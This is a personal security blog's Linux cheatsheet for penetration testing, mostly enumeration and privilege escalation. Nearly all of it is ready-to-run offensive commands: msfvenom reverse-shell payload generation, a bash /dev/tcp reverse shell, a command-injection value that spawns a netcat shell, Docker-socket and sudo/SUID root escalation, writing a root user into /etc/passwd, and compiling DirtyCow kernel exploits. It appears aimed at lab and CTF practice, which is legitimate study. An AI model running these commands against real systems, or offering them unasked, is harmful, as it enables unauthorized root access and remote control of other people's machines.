======================
== gkourgkoutas.net ==
======================
Rethink Security

Linux Cheatsheet

security linux cheats tools privesc

Writing a full hands-on of BloodHound takes more time than I thought, hence Part II is going to be delayed until I’m fully satisfied with the results. Thus I thought I will share some of my Linux cheats which I use (mostly for enumeration and privilege escalation stuff). A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.team.

Nmap

Scan with different wildcards. Nickname; Big Boy Scan

$ sudo nmap -A -sV -O --min-rate 600 --script "(vuln or exploit or auth) and not broadcast" -oA <rhost>-script <rhost> -p <ports>

Search and filter nmap scripts with different wildcards

$ locate -r '\.nse$' | xarg grep categories | grep '\default\|version\|safe' | grep smb

Script adjusting with wildcard and port

$ nmap --script safe -p 445 <ip>

Python

Webserver

Spawn a webserver in current directory

$ python3 -m http.server <port>

Ports like 80, 443, 445 etc. need root priviledges.

Upgrade shell

$ python -c 'import pty; pty.spawn("/bin/bash")'

IMPORTANT - pay attention to which Python version is installed and used on the target system, if necessary:

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Virtual Environment

For some exploits, older Python versions like 2.7 work better. Sometimes only version 2.7 exploits are working. Then create the virtual environment with Python 2.

Create

Python 3

$ python3 -m venv /path/to/venv/MyVenv

Python 2

$ virtualenv -p /usr/bin/python2.7 MyVenv

Activate

$ source MyVenv/bin/activate

Deactivate (Both)

$ deactivate

Dirsearch

Two bash one-liners, which open all HTTP 200 responses in Firefox

$ grep -i '200\|Target' <file>

Pasting the output into a file

$ echo "Enter path to temporary file:" && read file && firefox & ; baseUrl=$(cat ${file} | grep "Target: " | awk -F "http" '{print $2}' | cut -d "^" -f 1) && baseUrl=${baseUrl%?} && cat ${file} | grep -v "Last request to" | grep "200 -" | cut -d "-" -f 3 | cut -d "^" -f 1 | sed "s/ //" | awk -v url="$baseUrl" '{print "firefox -url http" url $0}' | bash

Netcat

Connect

$ nc -vv <ip> <port>

Listen

$ nc -lvnp <port>

Shell

After Python Upgrade

# Reverse shell into the background 
CTRL + Z
# Type into your local shell
stty raw -echo 
# To open up the reverse shell again
fg
# To use clear and tab completion
export TERM=xterm

Restricted Shells (rbash)

$ ssh <user>@<ip> -t "bash --noprofile"

Write into /etc/passwd

<user>:$(openssl passwd -1 -salt <user> <password>):0:0:root:/bin/bash

Docker

Sometimes misconfigurations in Docker lead to easy privilege escalations. This is a good Indicator

$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),30(dip),
46(plugdev),110(lpadmin),111(sambashare),'122(docker)'

Furthermore LinPeas1 can also do this quite well with the following output

[+] Analyzing .socket files
[...]
'Docker socket /var/run/docker.sock is writable' 
[...]

Exploit

There are several exploits for this vulnerability:

$ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
$ sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh

More of these can be found here: https://www.hackingarticles.in/docker-privilege-escalation/

Search for files and password

$ find / -writable -type d 2>/dev/null
$ grep -lRi "password" /home /var/www /var/log 2>/dev/null | sort | uniq
$ grep -Ri "password" /home /var/www /var/log 2>/dev/null | sort | uniq

MSFVENOM

Powershell

$ msfvenom --platform windows -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f vba-psh

Java/JSP

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<host> LPORT=<port> -f raw > shell.jsp

WAR (JSP)

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<host> LPORT=<port> -f war > shell.war

Creates an unstaged x86 shell

$ msfvenom -p windows/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe > shell.exe

Creates an unstaged x64 shell

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<host> LPORT=<port> -f exe > shell.exe

Staged payload: windows/x64/meterpreter/reverse_tcp

Unstaged: windows/shell_reverse_tcp

More examples of MSFVenom reverse shells: MSFVenom Reverse Shell Cheatsheet

SSH

Troubleshooting the following error on SSH

Unable to negotiate with <ip> port 22: no matching key exchange method found. 
Their offer: 'diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1'
  • Check which authentication methods are allowed (password, key)
  • If password based authentication is allowed, use the following command
$ ssh -l bob <ip> -oKexAlgorithms=%one of the highlighted algorithmns%

User management

Change user

$ su <username>

Files with root priviledges

Use the following command to determine if some program can be run as root:

$ sudo -l 
(ROOT) /usr/bin/perl

Then execute it with the full path

$ sudo /usr/bin/perl <command>

A good read: https://gtfobins.github.io/

SUID BITS

Are there any interesting SUID bits?

Is the binary executable?

  • Which commands are being used? Are files/directories modified or created?
    • If you can modify the file, try to write a shell into it
    • For examle a bash reverse shell:
      $ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
      

If it’s not executable

  • Try to use the strings command, to see what the binary is doing or if there is any lead. Otherwise google the name of the binary. You can also look into https://gtfobins.github.io/

SSH Private Key

If the following error occurs

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Permissions 0644 for 'rsakey' are too open.
It is required that your private key files are NOT accessible by others.

This private key will be ignored.

Load key "rsakey": bad permissions

Use chmod 600 on the private key.

Command Injection

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

We can control the $value in this command and if we fill it with 'nc <ip> <port> -c bash;' it will open up a reverse shell

Also interesting:

Kernel exploit

DirtyCow

There are many variants of dirty cow, however the following two work most of the time

  • 40839.c (Pokemon)

    • Compile with the following command
      $ gcc -pthread 40839.c -o <name> -lcrypt
      
    • This will create a user firefart and prompts for a password
  • 40611.c (The “original” DirtyCow exploit)

    • Compile with the following command
      $ gcc -pthread 40611.c -o dirtcow
      
    • Asks for a file which needs to be modified. Ideally a new user is written into /etc/passwd

  1. https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS ↩︎